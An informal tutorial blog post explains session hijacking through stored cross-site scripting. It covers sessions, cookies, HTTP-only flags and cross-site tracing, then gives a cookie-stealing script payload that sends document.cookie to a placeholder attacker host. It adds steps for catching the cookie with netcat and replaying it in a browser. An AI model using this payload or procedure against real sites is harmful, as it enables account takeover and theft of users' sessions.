Session Hijacking in XSS to MYSQL File
Hi, after a long Time i am coming with my new post how to Hijack The someone Session.
sounds Interesting. is it possible to hijacking or steal someone cookie or someone Session. Yes! it's possible. I am going to telling you how's it Possible.
First! of All, it is also a Web-App Vulnerability. In OWASP TOP-10 A-2 Broken authentication and Session managment. Covers the Session managment issues.
(1) Session sniffing
(2) Session fixation
(3) Session hijacking
First, for non-technical persons, they want to know what is Session or what is Cookie?
A session can be defined as a server-side storage of information that is
desired to persist throughout the user's interaction with the web site
or web application.
A cookie is a small piece of text stored on a user's computer by their
browser. Common uses for cookies are authentication, storing of site
preferences, and server session identification.
Now, How i am able to steal Some one Session.
If The web application is Vulnerable from XSS (cross site scripting) it is also a OWASP-TOP 10 Vulnerability. A-3 Cross Site Scripting (XSS) we can steal someone Session or Cookie Using XSS Session-id Stealing script. but there one condition the cookie is not set to HTTP-only flag. If the cookie is set to HTTP-only flag we can not steal the session-id till the TRACE method is not enabled on Server. if The TRACE method is enabled and Cookie is set to HTTP-only there is a Vulnerabilty called XST(Cross Site Tracing) from this vulnerabilty we can also steal the Cookie which is set to HTTP-only flag. XSS(cross site scripting) is a client side attack. Thats why it's effected your browser.
Next Step, is MITM Attack (Man in the middle) Attack & we can also sniff the traffic of the victim's machine etc.
I am going to telling you using XSS (cross site Scipritng) Session-id Stealing Script. In my demo web-application the application is vulnerable from Stored-XSS.
<script>document.write('<img src="http://attacker-ip/website:port-no/?'+document.cookie+'"/>');</script>
when this script executed in the web application it writes the cookie of the victim on Attacker's ip address or Attacker Domain name where the port no. is listening.
I used NC(netcat) for capturing the Victim's Cookie.
where the port no. 1234 is listen
after Capturing The cookie i used Firefox Add-on (Web devoloper) for setting the victim session-id and refersh. the page.
Show the Full tutorial in this video below.
i am able to view victim's Session. :) :) :) :)
Thanx for watching the Video & reading this.
For any query:- kindly post your comments. :)
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